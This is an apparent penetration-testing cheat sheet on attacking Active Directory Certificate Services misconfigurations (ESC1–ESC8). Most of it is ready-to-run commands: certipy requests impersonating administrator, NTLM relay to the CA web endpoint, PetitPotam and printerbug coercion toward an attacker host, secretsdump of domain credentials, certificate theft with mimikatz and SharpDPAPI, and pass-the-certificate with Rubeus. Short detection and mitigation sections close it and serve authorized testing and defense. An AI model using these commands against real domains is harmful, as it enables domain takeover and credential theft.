Active Directory Certificate Services (AD CS) Attacks Exploit Active Directory Certificate Services misconfigurations to obtain certificates for privilege escalation.
Quick Reference certipy find -u user@domain.local -p password -dc-ip 10.10.10.10 impacket-ntlmrelayx -t http://ca-server/certsrv/certfnsh.asp --adcs --template KerberosAuthentication certipy auth -pfx dc01.pfx -dc-ip 10.10.10.10
AD CS Enumeration Certipy certipy find -u user@domain.local -p password -dc-ip 10.10.10.10 -vulnerable certipy find -u user@domain.local -p password -dc-ip 10.10.10.10 -vulnerable -output certipy_output certipy find -u user@domain.local -p password -ca CA-NAME
Certutil (Windows) # List certificate authorities certutil -config - -ping # List certificate templates certutil -v -template # View CA configuration certutil -CAInfo # List issued certificates certutil -view -restrict "Disposition=20 " -out "RequesterName,CommonName"
Vulnerability Template allows:
Client authentication
Enrollee supplies subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
No manager approval required
Low-privileged users can enroll
Exploitation certipy req -u user@domain.local -p password -ca CA-NAME -template VulnerableTemplate -upn administrator@domain.local -dc-ip 10.10.10.10 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 export KRB5CCNAME=administrator.ccacheimpacket-psexec -k -no-pass domain.local/administrator@dc.domain.local
ESC2 - Any Purpose EKU Vulnerability Template allows:
Any Purpose EKU or no EKU
Low-privileged users can enroll
Exploitation certipy req -u user@domain.local -p password -ca CA-NAME -template VulnerableTemplate -dc-ip 10.10.10.10 certipy auth -pfx user.pfx -dc-ip 10.10.10.10
ESC3 - Certificate Request Agent Vulnerability Template allows:
Certificate Request Agent EKU
No enrollment agent restrictions
Exploitation certipy req -u user@domain.local -p password -ca CA-NAME -template VulnerableTemplate -dc-ip 10.10.10.10 certipy req -u user@domain.local -p password -ca CA-NAME -template User -on-behalf-of 'domain\administrator' -pfx enrollment_agent.pfx -dc-ip 10.10.10.10
ESC4 - Vulnerable Certificate Template ACL Vulnerability Low-privileged user has write access to certificate template
Exploitation certipy template -u user@domain.local -p password -template SecureTemplate -save-old certipy req -u user@domain.local -p password -ca CA-NAME -template SecureTemplate -upn administrator@domain.local -dc-ip 10.10.10.10 certipy template -u user@domain.local -p password -template SecureTemplate -configuration SecureTemplate.json
ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 Vulnerability CA has EDITF_ATTRIBUTESUBJECTALTNAME2 flag set, allowing SAN specification in any template
Exploitation certipy req -u user@domain.local -p password -ca CA-NAME -template User -upn administrator@domain.local -dc-ip 10.10.10.10 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
ESC7 - Vulnerable CA ACL Vulnerability Low-privileged user has ManageCA or ManageCertificates rights on CA
Exploitation certipy ca -u user@domain.local -p password -ca CA-NAME -add-officer user -dc-ip 10.10.10.10 certipy ca -u user@domain.local -p password -ca CA-NAME -enable-template VulnerableTemplate -dc-ip 10.10.10.10 certipy ca -u user@domain.local -p password -ca CA-NAME -issue-request 123 -dc-ip 10.10.10.10
ESC8 - NTLM Relay to AD CS HTTP Endpoints Vulnerability AD CS web enrollment accessible over HTTP without EPA/SMB signing
Setup NTLM Relay impacket-ntlmrelayx -t http://ca-server/certsrv/certfnsh.asp --adcs --template KerberosAuthentication -smb2support impacket-ntlmrelayx -t http://ca-server/certsrv/certfnsh.asp --adcs --template DomainController -smb2support
Coerce Authentication python3 printerbug.py domain.local/user:password@dc.domain.local attacker-ip python3 PetitPotam.py attacker-ip dc.domain.local -u user -p password coercer coerce -u user -p password -d domain.local -l attacker-ip -t dc.domain.local
Use Certificate certipy cert -pfx dc01.pfx -nokey -out dc01.crt certipy cert -pfx dc01.pfx -nocert -out dc01.key certipy auth -pfx dc01.pfx -dc-ip 10.10.10.10 sudo ntpdate -s dc.domain.localexport KRB5CCNAME=dc01.ccacheimpacket-secretsdump -k -no-pass domain.local/dc01\$@dc .domain.local
Certificate Theft .\SharpDPAPI.exe certificates /machine .\mimikatz.exe mimikatz mimikatz
File System Certificate Theft find / -name "*.pfx" 2>/dev/null find / -name "*.p12" 2>/dev/null dir /s /b *.pfxdir /s /b *.p12
Pass-the-Certificate gettgtpkinit.py python3 gettgtpkinit.py -cert-pfx user.pfx -dc-ip 10.10.10.10 domain.local/user user.ccache export KRB5CCNAME=user.ccacheimpacket-psexec -k -no-pass domain.local/user@target.domain.local
Rubeus (Windows) .\Rubeus.exe asktgt /user:user /certificate:user.pfx /password:certpass /ptt klist dir \\dc\c$
Notes ESC Attack Summary
ESC
Vulnerability
Impact
Difficulty
ESC1
Enrollee supplies subject
Domain Admin
Easy
ESC2
Any Purpose EKU
Domain Admin
Easy
ESC3
Certificate Request Agent
Domain Admin
Medium
ESC4
Vulnerable template ACL
Domain Admin
Medium
ESC5
Vulnerable PKI object ACL
Domain Admin
Medium
ESC6
EDITF_ATTRIBUTESUBJECTALTNAME2
Domain Admin
Easy
ESC7
Vulnerable CA ACL
Domain Admin
Medium
ESC8
NTLM relay to HTTP
Domain Admin
Easy
Detection AD CS attacks generate:
Event ID 4886 (Certificate Services received certificate request)
Event ID 4887 (Certificate Services approved and issued certificate)
Event ID 4768 (Kerberos TGT requested) with certificate
Event ID 4769 (Kerberos TGS requested) with certificate
Unusual certificate requests for privileged accounts
Certificate requests with SAN for different users
Time Skew Issues Kerberos requires time sync within 5 minutes:
sudo ntpdate -s dc.domain.localfaketime "$(rdate -n dc.domain.local -p | awk '{print $2, $3, $4}') " bash
Certificate Validity
Certificates remain valid even after password change
Certificates can be used for authentication until expiration
Default validity: 1 year
Useful for persistence
Common Misconfigurations Frequently found issues:
Web enrollment over HTTP (ESC8)
Templates with enrollee supplies subject (ESC1)
EDITF_ATTRIBUTESUBJECTALTNAME2 enabled (ESC6)
Overly permissive template ACLs (ESC4)
Any Purpose EKU templates (ESC2)
Mitigation Recommendations For clients:
Disable HTTP enrollment (use HTTPS with EPA)
Enable SMB signing on all systems
Audit certificate template permissions
Remove enrollee supplies subject flag
Disable EDITF_ATTRIBUTESUBJECTALTNAME2
Implement manager approval for sensitive templates
Monitor Event IDs 4886, 4887
Regular AD CS security audits
Implement certificate enrollment restrictions
Use short certificate validity periods
Certipy vs Certify
Feature
Certipy (Linux)
Certify (Windows)
Enumeration
✓
✓
ESC1-8
✓
✓
Certificate request
✓
✓
Authentication
✓
✗ (use Rubeus)
Template modification
✓
✗
Cross-platform
Linux
Windows
Resources